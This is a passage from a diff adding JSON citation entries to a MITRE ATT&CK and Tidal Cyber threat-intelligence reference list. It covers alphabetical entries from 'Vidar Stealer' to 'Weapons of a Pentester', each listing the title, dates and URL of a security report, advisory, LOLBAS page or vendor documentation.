"date_accessed": "2023-11-16T00:00:00Z", + "date_published": "2021-09-23T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://web.archive.org/web/20221201005558/https://minerva-labs.com/blog/vidar-stealer-evasion-arsenal/" + ], + "source": "Tidal Cyber", + "title": "Vidar Stealer Evasion Arsenal" + }, + "related": [], + "uuid": "ce9714d3-7f7c-4068-bcc8-0f0eeaf0dc0b", + "value": "Minerva Labs Vidar Stealer Evasion" + }, + { + "description": "Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.", + "meta": { + "date_accessed": "2021-03-01T00:00:00Z", + "date_published": "2021-02-24T00:00:00Z", + "refs": [ + "https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" + ], + "source": "MITRE", + "title": "Vietnamese activists targeted by notorious hacking group" + }, + "related": [], + "uuid": "a54a2f68-8406-43ab-8758-07edd49dfb83", + "value": "Amnesty Intl. Ocean Lotus February 2021" + }, + { + "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.", + "meta": { + "date_accessed": "2020-04-28T00:00:00Z", + "date_published": "2020-04-22T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html" + ], + "source": "MITRE", + "title": "Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage" + }, + "related": [], + "uuid": "347ad5a1-d0b1-4f2b-9abd-eff96d05987d", + "value": "FireEye APT32 April 2020" + }, + { + "description": "Slack Help Center. (n.d.). View Access Logs for your workspace. Retrieved April 10, 2023.", + "meta": { + "date_accessed": "2023-04-10T00:00:00Z", + "refs": [ + "https://slack.com/help/articles/360002084807-View-Access-Logs-for-your-workspace" + ], + "source": "MITRE", + "title": "View Access Logs for your workspace" + }, + "related": [], + "uuid": "b179d0d4-e115-59f1-86a7-7dcfc253e16f", + "value": "Slack Help Center Access Logs" + }, + { + "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.", + "meta": { + "date_accessed": "2020-06-17T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs" + ], + "source": "MITRE", + "title": "View Azure activity logs" + }, + "related": [], + "uuid": "19b55c10-f4fd-49c2-b267-0d3d8e9acdd7", + "value": "Azure Activity Logs" + }, + { + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "meta": { + "date_accessed": "2018-09-13T00:00:00Z", + "refs": [ + "https://www.justice.gov/file/1080281/download" + ], + "source": "MITRE", + "title": "VIKTOR BORISOVICH NETYKSHO, et al" + }, + "related": [], + "uuid": "d65f371b-19d0-49de-b92b-94a2bea1d988", + "value": "DOJ GRU Indictment Jul 2018" + }, + { + "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.", + "meta": { + "date_accessed": "2020-06-22T00:00:00Z", + "date_published": "2014-11-28T00:00:00Z", + "refs": [ + "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html" + ], + "source": "MITRE", + "title": "Virtual File Systems for Beginners" + }, + "related": [], + "uuid": "c06af73d-5ed0-46a0-a5a9-161035075884", + "value": "MalwareTech VFS Nov 2014" + }, + { + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "meta": { + "date_accessed": "2018-03-12T00:00:00Z", + "date_published": "2017-03-17T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + ], + "source": "MITRE", + "title": "Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated" + }, + "related": [], + "uuid": "e75f2d0f-f63e-48c7-a0c3-8f00f371624e", + "value": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "description": "Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://cloud.google.com/compute/docs/instances" + ], + "source": "MITRE", + "title": "Virtual machine instances" + }, + "related": [], + "uuid": "2b7ec610-5654-4c94-b5df-9cf5670eec33", + "value": "Google VM" + }, + { + "description": "Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2019-03-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get" + ], + "source": "MITRE", + "title": "Virtual Machines - Get" + }, + "related": [], + "uuid": "f565c237-07c5-4e9e-9879-513627517109", + "value": "Microsoft Virutal Machine API" + }, + { + "description": "Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update" + ], + "source": "MITRE", + "title": "Virtual Machines - Update" + }, + "related": [], + "uuid": "299f231f-70d1-4c1a-818f-8a01cf65382c", + "value": "Azure Update Virtual Machines" + }, + { + "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.", + "meta": { + "date_accessed": "2022-03-17T00:00:00Z", + "date_published": "2022-02-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview" + ], + "source": "MITRE", + "title": "Virtual network TAP" + }, + "related": [], + "uuid": "3f106d7e-f101-4adb-bbd1-d8c04a347f85", + "value": "Azure Virtual Network TAP" + }, + { + "description": "Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "date_published": "2019-09-23T00:00:00Z", + "refs": [ + "https://cloud.google.com/vpc/docs/vpc" + ], + "source": "MITRE", + "title": "Virtual Private Cloud (VPC) network overview" + }, + "related": [], + "uuid": "9ebe53cf-657f-475d-85e4-9e30f4af1e7d", + "value": "Google VPC Overview" + }, + { + "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", + "meta": { + "date_accessed": "2017-03-20T00:00:00Z", + "date_published": "2015-10-07T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/" + ], + "source": "MITRE", + "title": "Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence" + }, + "related": [], + "uuid": "b299f8e7-01da-4d59-9657-ef93cf284cc0", + "value": "Volexity Virtual Private Keylogging" + }, + { + "description": "VirusTotal. (2023, July 11). VirusTotal Behavior def.exe. Retrieved July 11, 2023.", + "meta": { + "date_accessed": "2023-07-11T00:00:00Z", + "date_published": "2023-07-11T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.virustotal.com/gui/file/7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893/behavior" + ], + "source": "Tidal Cyber", + "title": "VirusTotal Behavior def.exe" + }, + "related": [], + "uuid": "3502c98d-b61d-42fa-b23e-7128a4042c03", + "value": "VirusTotal Behavior def.exe" + }, + { + "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", + "meta": { + "date_accessed": "2019-05-23T00:00:00Z", + "refs": [ + "https://www.virustotal.com/en/faq/" + ], + "source": "MITRE", + "title": "VirusTotal FAQ" + }, + "related": [], + "uuid": "5cd965f6-c4af-40aa-8f08-620cf5f1242a", + "value": "VirusTotal FAQ" + }, + { + "description": "Visa. (2015, March). Visa Security Alert: \"RawPOS\" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.", + "meta": { + "date_accessed": "2017-10-06T00:00:00Z", + "date_published": "2015-03-01T00:00:00Z", + "refs": [ + "https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf" + ], + "source": "MITRE", + "title": "Visa Security Alert: \"RawPOS\" Malware Targeting Lodging Merchants" + }, + "related": [], + "uuid": "a2371f44-0a88-4d68-bbe7-7e79f13f78c2", + "value": "Visa RawPOS March 2015" + }, + { + "description": "Boutin, J. and Faou, M. (2018). Visiting the snake nest. Retrieved May 7, 2019.", + "meta": { + "date_accessed": "2019-05-07T00:00:00Z", + "date_published": "2018-01-01T00:00:00Z", + "refs": [ + "https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf" + ], + "source": "MITRE", + "title": "Visiting the snake nest" + }, + "related": [], + "uuid": "b69d7c73-40c2-4cb2-b9ad-088ef61e2f7f", + "value": "ESET Recon Snake Nest" + }, + { + "description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/dotnet/visual-basic/" + ], + "source": "MITRE", + "title": "Visual Basic documentation" + }, + "related": [], + "uuid": "b23a1a5d-48dd-4346-bf8d-390624214081", + "value": "VB Microsoft" + }, + { + "description": "Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.", + "meta": { + "date_accessed": "2020-08-13T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Visual_Basic_for_Applications" + ], + "source": "MITRE", + "title": "Visual Basic for Applications" + }, + "related": [], + "uuid": "70818420-c3ec-46c3-9e97-d8f989f2e3db", + "value": "Wikipedia VBA" + }, + { + "description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2020-03-11T00:00:00Z", + "refs": [ + "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/" + ], + "source": "MITRE", + "title": "Visual Basic support planned for .NET 5.0" + }, + "related": [], + "uuid": "da6d1b56-8e59-4125-b318-48a40a1c8e94", + "value": "VB .NET Mar 2020" + }, + { + "description": "LOLBAS. (2021, September 26). VisualUiaVerifyNative.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/" + ], + "source": "Tidal Cyber", + "title": "VisualUiaVerifyNative.exe" + }, + "related": [], + "uuid": "b17be296-15ad-468f-8157-8cb4093b2e97", + "value": "VisualUiaVerifyNative.exe - LOLBAS Project" + }, + { + "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.", + "meta": { + "date_accessed": "2020-05-01T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" + ], + "source": "MITRE", + "title": "VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus" + }, + "related": [], + "uuid": "43bcb35b-56e1-47a8-9c74-f7543a25b2a6", + "value": "Carbon Black HotCroissant April 2020" + }, + { + "description": "Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "refs": [ + "https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/" + ], + "source": "MITRE", + "title": "VNC Authentication" + }, + "related": [], + "uuid": "90a5ab3c-c2a8-4b02-9bd7-628672907737", + "value": "Offensive Security VNC Authentication Check" + }, + { + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.", + "meta": { + "date_accessed": "2021-02-08T00:00:00Z", + "date_published": "2015-03-30T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "VOLATILE CEDAR" + }, + "related": [], + "uuid": "a26344a2-63ca-422e-8cf9-0cf22a5bee72", + "value": "CheckPoint Volatile Cedar March 2015" + }, + { + "description": "Microsoft Threat Intelligence. (2023, May 24). Volt Typhoon targets US critical infrastructure with living-off-the-land techniques. Retrieved July 27, 2023.", + "meta": { + "date_accessed": "2023-07-27T00:00:00Z", + "date_published": "2023-05-24T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" + ], + "source": "MITRE", + "title": "Volt Typhoon targets US critical infrastructure with living-off-the-land techniques" + }, + "related": [], + "uuid": "8b74f0b7-9719-598c-b3ee-61d734393e6f", + "value": "Microsoft Volt Typhoon May 2023" + }, + { + "description": "LOLBAS. (2023, July 12). VSDiagnostics.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-07-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/" + ], + "source": "Tidal Cyber", + "title": "VSDiagnostics.exe" + }, + "related": [], + "uuid": "b4658fc0-af16-45b1-8403-a9676760a36a", + "value": "VSDiagnostics.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2023, September 6). Vshadow.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-09-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/" + ], + "source": "Tidal Cyber", + "title": "Vshadow.exe" + }, + "related": [], + "uuid": "ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c", + "value": "Vshadow.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2021, September 24). VSIISExeLauncher.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/" + ], + "source": "Tidal Cyber", + "title": "VSIISExeLauncher.exe" + }, + "related": [], + "uuid": "e2fda344-77b8-4650-a7da-1e422db6d3a1", + "value": "VSIISExeLauncher.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). vsjitdebugger.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/" + ], + "source": "Tidal Cyber", + "title": "vsjitdebugger.exe" + }, + "related": [], + "uuid": "94a880fa-70b0-46c3-997e-b22dc9180134", + "value": "vsjitdebugger.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2022, November 1). vsls-agent.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-11-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/" + ], + "source": "Tidal Cyber", + "title": "vsls-agent.exe" + }, + "related": [], + "uuid": "325eab54-bcdd-4a12-ab41-aaf06a0405e9", + "value": "vsls-agent.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2023, September 8). vstest.console.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-09-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/" + ], + "source": "Tidal Cyber", + "title": "vstest.console.exe" + }, + "related": [], + "uuid": "70c168a0-9ddf-408d-ba29-885c0c5c936a", + "value": "vstest.console.exe - LOLBAS Project" + }, + { + "description": "Kanthak, S.. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.", + "meta": { + "date_accessed": "2017-02-03T00:00:00Z", + "date_published": "2016-07-20T00:00:00Z", + "refs": [ + "https://skanthak.homepage.t-online.de/sentinel.html" + ], + "source": "MITRE", + "title": "Vulnerability and Exploit Detector" + }, + "related": [], + "uuid": "d63d6e14-8fe7-4893-a42f-3752eaec8770", + "value": "Vulnerability and Exploit Detector" + }, + { + "description": "Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.", + "meta": { + "date_accessed": "2017-02-03T00:00:00Z", + "date_published": "2016-07-20T00:00:00Z", + "refs": [ + "https://skanthak.homepage.t-online.de/sentinel.html" + ], + "source": "MITRE", + "title": "Vulnerability and Exploit Detector" + }, + "related": [], + "uuid": "94f99326-1512-47ca-8c99-9b382e4d0261", + "value": "Kanthak Sentinel" + }, + { + "description": "Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.", + "meta": { + "date_accessed": "2015-12-23T00:00:00Z", + "date_published": "2014-11-18T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/security/ms14-068.aspx" + ], + "source": "MITRE", + "title": "Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)" + }, + "related": [], + "uuid": "db78c095-b7b2-4422-8473-49d4a1129b76", + "value": "Technet MS14-068" + }, + { + "description": "vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2021-06-30T00:00:00Z", + "refs": [ + "https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug" + ], + "source": "MITRE", + "title": "VX-API" + }, + "related": [], + "uuid": "8c7fe2a2-64a1-4680-a4e6-f6eefe00407a", + "value": "vxunderground debug" + }, + { + "description": "Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.", + "meta": { + "date_accessed": "2015-09-17T00:00:00Z", + "date_published": "2011-11-01T00:00:00Z", + "refs": [ + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf" + ], + "source": "MITRE", + "title": "W32.Duqu: The precursor to the next Stuxnet" + }, + "related": [], + "uuid": "8660411a-6b9c-46c2-8f5f-049ec60c7d40", + "value": "Symantec W32.Duqu" + }, + { + "description": "Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.", + "meta": { + "date_accessed": "2020-12-07T00:00:00Z", + "date_published": "2011-02-01T00:00:00Z", + "refs": [ + "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + ], + "source": "MITRE", + "title": "W32.Stuxnet Dossier" + }, + "related": [], + "uuid": "ef65ab18-fd84-4098-8805-df0268fc3a38", + "value": "Symantec W.32 Stuxnet Dossier" + }, + { + "description": "Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January 14, 2022.", + "meta": { + "date_accessed": "2022-01-14T00:00:00Z", + "date_published": "2009-03-22T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2" + ], + "source": "MITRE", + "title": "W32.Tidserv.G" + }, + "related": [], + "uuid": "9d4ac51b-d870-43e8-bc6f-d7159343b00c", + "value": "w32.tidserv.g" + }, + { + "description": "Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.", + "meta": { + "date_accessed": "2018-03-26T00:00:00Z", + "date_published": "2017-10-28T00:00:00Z", + "refs": [ + "https://github.com/scottlundgren/w32time" + ], + "source": "MITRE", + "title": "w32time" + }, + "related": [], + "uuid": "a248fd87-c3c1-4de7-a9af-0436a10f71aa", + "value": "Github W32Time Oct 2017" + }, + { + "description": "Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.", + "meta": { + "date_accessed": "2019-04-12T00:00:00Z", + "date_published": "2002-04-25T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99" + ], + "source": "MITRE", + "title": "W95.CIH" + }, + "related": [], + "uuid": "a35cab17-634d-4a7a-a42c-4a4280e8785d", + "value": "Symantec Chernobyl W95.CIH" + }, + { + "description": "LOLBAS. (2018, May 25). Wab.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wab/" + ], + "source": "Tidal Cyber", + "title": "Wab.exe" + }, + "related": [], + "uuid": "c432556e-c7f9-4e36-af7e-d7bea6f51e95", + "value": "Wab.exe - LOLBAS Project" + }, + { + "description": "Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.", + "meta": { + "date_accessed": "2021-02-17T00:00:00Z", + "date_published": "2020-08-11T00:00:00Z", + "refs": [ + "https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN" + ], + "source": "MITRE", + "title": "WakeOnLAN (WOL)" + }, + "related": [], + "uuid": "120e3b14-f08b-40e0-9d20-4ddda6b8cc06", + "value": "GitLab WakeOnLAN" + }, + { + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "meta": { + "date_accessed": "2019-03-15T00:00:00Z", + "date_published": "2017-05-23T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + ], + "source": "MITRE", + "title": "WannaCry Malware Profile" + }, + "related": [], + "uuid": "34b15fe1-c550-4150-87bc-ac9662547247", + "value": "FireEye WannaCry 2017" + }, + { + "description": "Bundesamt fur Verfassungsschutz. (2024, February 17). Warning of North Korean cyber threats targeting the Defense Sector. Retrieved February 26, 2024.", + "meta": { + "date_accessed": "2024-02-26T00:00:00Z", + "date_published": "2024-02-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2" + ], + "source": "Tidal Cyber", + "title": "Warning of North Korean cyber threats targeting the Defense Sector" + }, + "related": [], + "uuid": "cc76be15-6d9d-40b2-b7f3-196bb0a7106a", + "value": "BfV North Korea February 17 2024" + }, + { + "description": "Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency Miners: A Battle for Resources. Retrieved April 6, 2021.", + "meta": { + "date_accessed": "2021-04-06T00:00:00Z", + "date_published": "2020-09-10T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html" + ], + "source": "MITRE", + "title": "War of Linux Cryptocurrency Miners: A Battle for Resources" + }, + "related": [], + "uuid": "1ba47efe-35f8-4d52-95c7-65cdc829c8e5", + "value": "Trend Micro War of Crypto Miners" + }, + { + "description": "Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021.", + "meta": { + "date_accessed": "2021-12-17T00:00:00Z", + "date_published": "2020-02-03T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/" + ], + "source": "MITRE", + "title": "Warzone: Behind the enemy lines" + }, + "related": [], + "uuid": "c214c36e-2bc7-4b98-a74e-529aae99f9cf", + "value": "Check Point Warzone Feb 2020" + }, + { + "description": "Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022.", + "meta": { + "date_accessed": "2022-04-07T00:00:00Z", + "date_published": "2020-11-25T00:00:00Z", + "refs": [ + "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique" + ], + "source": "MITRE", + "title": "Warzone RAT comes with UAC bypass technique" + }, + "related": [], + "uuid": "1324b314-a4d9-43e7-81d6-70b6917fe527", + "value": "Uptycs Warzone UAC Bypass November 2020" + }, + { + "description": "Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.", + "meta": { + "date_accessed": "2021-01-20T00:00:00Z", + "refs": [ + "https://www.dragos.com/threat/wassonite/" + ], + "source": "MITRE", + "title": "WASSONITE" + }, + "related": [], + "uuid": "39e6ab06-9f9f-4292-9034-b2f56064164d", + "value": "Dragos WASSONITE" + }, + { + "description": "Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "date_published": "2020-06-23T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/" + ], + "source": "MITRE", + "title": "WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group" + }, + "related": [], + "uuid": "1520f2e5-2689-428f-9ee4-05e153a52381", + "value": "NCC Group WastedLocker June 2020" + }, + { + "description": "Walter, J.. (2020, July 23). WastedLocker Ransomware: Abusing ADS and NTFS File Attributes. Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "date_published": "2020-07-23T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/" + ], + "source": "MITRE", + "title": "WastedLocker Ransomware: Abusing ADS and NTFS File Attributes" + }, + "related": [], + "uuid": "5ed4eb07-cc90-46bc-8527-0bb59e1eefe1", + "value": "Sentinel Labs WastedLocker July 2020" + }, + { + "description": "Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "date_published": "2020-07-28T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" + ], + "source": "MITRE", + "title": "Watch Your Containers: Doki Infecting Docker Servers in the Cloud" + }, + "related": [], + "uuid": "688b2582-6602-44e1-aaac-3a4b8e168b04", + "value": "Intezer Doki July 20" + }, + { + "description": "Su, V. et al. (2019, December 11). Waterbear Returns, Uses API Hooking to Evade Security. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2019-12-11T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html" + ], + "source": "MITRE", + "title": "Waterbear Returns, Uses API Hooking to Evade Security" + }, + "related": [], + "uuid": "bf320133-3823-4232-b7d2-d07da9bbccc2", + "value": "Trend Micro Waterbear December 2019" + }, + { + "description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.", + "meta": { + "date_accessed": "2019-07-08T00:00:00Z", + "date_published": "2019-06-20T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments" + ], + "source": "MITRE", + "title": "Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments" + }, + "related": [], + "uuid": "ddd5c2c9-7126-4b89-b415-dc651a2ccc0e", + "value": "Symantec Waterbug Jun 2019" + }, + { + "description": "M.Léveillé, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.", + "meta": { + "date_accessed": "2022-05-06T00:00:00Z", + "date_published": "2022-01-25T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/" + ], + "source": "MITRE", + "title": "Watering hole deploys new macOS malware, DazzleSpy, in Asia" + }, + "related": [], + "uuid": "212012ac-9084-490f-8dd2-5cc9ac6e6de1", + "value": "ESET DazzleSpy Jan 2022" + }, + { + "description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog" + ], + "source": "MITRE", + "title": "wbadmin delete catalog" + }, + "related": [], + "uuid": "6adfba35-3bf1-4915-813e-40c4a843ae34", + "value": "win_wbadmin_delete_catalog" + }, + { + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.", + "meta": { + "date_accessed": "2019-03-26T00:00:00Z", + "date_published": "2017-05-18T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/wcry-ransomware-analysis" + ], + "source": "MITRE", + "title": "WCry Ransomware Analysis" + }, + "related": [], + "uuid": "522b2a19-1d15-48f8-8801-c64d3abd945a", + "value": "SecureWorks WannaCry Analysis" + }, + { + "description": "Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "date_published": "2015-11-07T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=lDvf4ScWbcQ" + ], + "source": "MITRE", + "title": "Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers" + }, + "related": [], + "uuid": "fd22c941-b0dc-4420-b363-2f5777981041", + "value": "Aleks Weapons Nov 2015" + }, + { + 